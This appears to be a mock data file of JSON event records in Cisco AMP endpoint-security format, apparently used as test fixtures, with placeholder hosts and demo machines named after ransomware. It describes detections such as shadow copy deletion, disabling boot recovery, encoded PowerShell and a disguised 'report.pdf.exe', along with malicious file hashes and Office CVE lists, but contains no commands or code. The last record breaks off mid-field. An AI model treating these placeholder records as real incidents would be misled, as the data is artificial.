+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521138739846959000,"timestamp":1610618750,"timestamp_nanoseconds":846943000,"date":"2021-01-14T10:05:50+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618750,"start_date":"2021-01-14T10:05:50+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Quarantined","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"24:78:d8:fd:c4:75"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.","short_description":"W32.WScriptLaunchedZippedJS.ioc"},"file":{"disposition":"Clean","file_name":"WScript.exe","file_path":"/C:/Windows/System32/WScript.exe","identity":{"sha256":"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0"},"parent":{"disposition":"Clean","identity":{"sha256":"0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576726048000300,"timestamp":1610618696,"timestamp_nanoseconds":48000000,"date":"2021-01-14T10:04:56+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618696,"start_date":"2021-01-14T10:04:56+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.","short_description":"W32.PossibleRansomwareShadowCopyDeletion.ioc"},"file":{"disposition":"Clean","file_name":"vssadmin.exe","file_path":"/C:/windows/system32/vssadmin.exe","identity":{"sha256":"e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1494576727672000300,"timestamp":1610618689,"timestamp_nanoseconds":672000000,"date":"2021-01-14T10:04:49+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610618689,"start_date":"2021-01-14T10:04:49+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.","short_description":"W32.BCDEditDisableRecovery.ioc"},"file":{"disposition":"Clean","file_name":"cmd.exe","file_path":"/C:/windows/system32/cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"},"parent":{"disposition":"Malicious","identity":{"sha256":"b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1458617561791000300,"timestamp":1610618620,"timestamp_nanoseconds":791000000,"date":"2021-01-14T10:03:40+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618620,"start_date":"2021-01-14T10:03:40+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Low_Prev_Retro","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"df:d1:ed:2d:c8:fc"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.","short_description":"W32.FakeExtensionExec.RET"},"file":{"disposition":"Malicious","file_name":"report.pdf.exe","file_path":"/c:/users/rsteadman/downloads/report.pdf.exe","identity":{"sha256":"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587034675643000,"timestamp":1610618511,"timestamp_nanoseconds":396000000,"date":"2021-01-14T10:01:51+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6880587034675642558","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225530,"description":"Object path not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","identity":{"sha256":"5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6880587030380676000,"timestamp":1610618510,"timestamp_nanoseconds":737000000,"date":"2021-01-14T10:01:50+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Generic.Malware.WX.9E93D282","detection_id":"6880587021790740668","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_BP_WMIPRVSE","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"be:b0:d5:89:e2:96"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Unknown","file_name":"p3fci4nu.dll","file_path":"\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll","identity":{"sha256":"1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48"},"parent":{"process_id":6708,"disposition":"Clean","file_name":"csc.exe","identity":{"sha256":"4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57","sha1":"93cf877f5627e55ec076a656e935042fac39950e","md5":"23ee3d381cfe3b9f6229483e2ce2f9e1"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":460392585524661250,"timestamp":1610618215,"timestamp_nanoseconds":615000000,"date":"2021-01-14T09:56:55+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610618215,"start_date":"2021-01-14T09:56:55+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"The psexec utility was executed as admin.","short_description":"W32.PsexecAsAdmin.ioc"},"file":{"disposition":"Clean","file_name":"PsExec.exe","file_path":"file:///C%3A/share%24/PsExec.exe","identity":{"sha256":"3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef"},"parent":{"disposition":"Clean","identity":{"sha256":"db06c3534964e3fc79d2763144ba53742d7fa250ca336f4a0fe724b75aaff386"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610611000,"timestamp_nanoseconds":758406329,"date":"2021-01-14T07:56:40+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":7007136035192884000,"timestamp":1610603346,"timestamp_nanoseconds":403000000,"date":"2021-01-14T05:49:06+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610603346,"start_date":"2021-01-14T05:49:06+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a shell was launched with an encoded command or to use Base64 to decode or encode an existing file or command. Malware authors may use this technique to bypass antivirus tools.","short_description":"W32.PowershellEncodedBuffer.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"file:///C%3A/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"},"parent":{"disposition":"Clean","identity":{"sha256":"a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515350231459808800,"timestamp":1610584664,"timestamp_nanoseconds":0,"date":"2021-01-14T00:37:44+00:00","event_type":"Threat Detected in Low Prevalence Executable","event_type_id":1107296278,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508191586038317000,"timestamp":1610584030,"timestamp_nanoseconds":579890366,"date":"2021-01-14T00:27:10+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6583671182384431000,"timestamp":1610582528,"timestamp_nanoseconds":614000000,"date":"2021-01-14T00:02:08+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_MAP_FriedEx","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"04:e6:4d:d5:7a:b5"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":695000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine Attempt Failed","event_type_id":2164260893,"detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":691000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Quarantine","event_type_id":553648155,"detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":684000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517762","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"11179468.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\11179468.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6411132837046518000,"timestamp":1610552212,"timestamp_nanoseconds":682000000,"date":"2021-01-13T15:36:52+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.0B965CA8AF-95.SBX.TG","detection_id":"6411132837046517761","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_1","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"f9:65:da:22:2a:41"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"MspthrdHash.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe","identity":{"sha256":"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960","sha1":"5faebef3bb880489195e80e6656ccf442ff7123b","md5":"84b6f7be5370c1998886214790c6892b"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15152998206589,"timestamp":1610534253,"timestamp_nanoseconds":0,"date":"2021-01-13T10:37:33+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1610534253,"start_date":"2021-01-13T10:37:33+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"WINWORD.EXE","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"},"parent":{"disposition":"Clean","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2013","cve":"CVE-2014-0260","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0260"},{"cve":"CVE-2014-1761","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-1761"},{"cve":"CVE-2014-6357","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6357"},{"cve":"CVE-2015-0085","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0085"},{"cve":"CVE-2015-0086","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-0086"},{"cve":"CVE-2015-1641","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1641"},{"cve":"CVE-2015-1650","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1650"},{"cve":"CVE-2015-1682","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-1682"},{"cve":"CVE-2015-2379","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2379"},{"cve":"CVE-2015-2380","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2380"},{"cve":"CVE-2015-2424","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-2424"},{"cve":"CVE-2016-0127","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-0127"},{"cve":"CVE-2016-7193","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-7193"},{"cve":"CVE-2017-0292","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0292"},{"cve":"CVE-2017-11826","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11826"}]}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508159571352093000,"timestamp":1610533415,"timestamp_nanoseconds":349000000,"date":"2021-01-13T10:23:35+00:00","event_type":"Policy 